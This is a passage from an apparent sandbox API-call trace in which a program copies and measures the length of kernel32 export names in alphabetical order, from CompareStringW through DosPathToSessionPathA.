returned="CompareStringW" [0083.687] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.687] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.687] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.687] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.687] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.687] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.687] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.687] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.687] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.687] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.687] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.688] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.688] lstrlenA (lpString="COPYFILEA") returned 9 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.688] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.688] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.688] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.688] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.688] lstrlenA (lpString="COPYFILEW") returned 9 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.688] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.688] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.688] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.688] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.688] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.688] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.688] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.688] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.688] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.688] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.688] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.689] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.689] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.689] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.689] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.689] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.689] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.689] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.689] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.689] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.689] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.689] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.689] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.689] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.689] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.689] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.689] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.689] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.689] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.690] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.690] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.690] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.690] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.690] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.690] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.690] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.690] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.690] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.690] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.690] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.690] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.690] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.690] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.690] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.690] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.690] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.691] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.691] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.691] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.691] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.691] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.691] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.691] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.691] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.691] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.691] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.691] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.691] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.691] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.691] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.691] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.691] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.691] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.691] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.691] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.691] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.692] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.692] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.692] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.692] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.692] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.692] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.692] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.692] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.692] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.692] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.692] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.692] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.692] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.692] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.692] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.692] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.692] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.692] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.692] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.693] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.693] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.693] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.693] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.693] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.693] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.693] lstrlenA (lpString="DELETEATOM") returned 10 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.693] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.693] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.693] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.693] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.693] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.693] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.693] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.693] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.693] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.693] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.693] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.693] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.694] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.694] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.694] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.694] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.694] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.694] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.694] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.694] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.694] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.694] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.694] lstrlenA 